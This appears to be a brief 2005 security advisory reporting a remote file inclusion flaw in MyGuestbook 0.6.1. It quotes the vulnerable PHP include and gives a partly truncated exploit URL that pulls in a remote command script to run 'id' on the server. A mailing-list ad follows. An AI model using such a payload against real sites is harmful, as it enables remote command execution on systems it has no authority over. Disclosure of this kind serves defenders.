Remote File Inclusion in MyGuestbook
Remote File Inclusion in MyGuestbook
Date: 10/07/2005
Severity: High
version: 0.6.1
The bug reside in form.inc.php3
The Vulnerable Code
if ($show < 1) {
include ("form.inc.php3");
}
Exploit :
http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id
Discovery by RoDheDoR
L-G-H Team
http://www.lezr.com
Best Regards
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/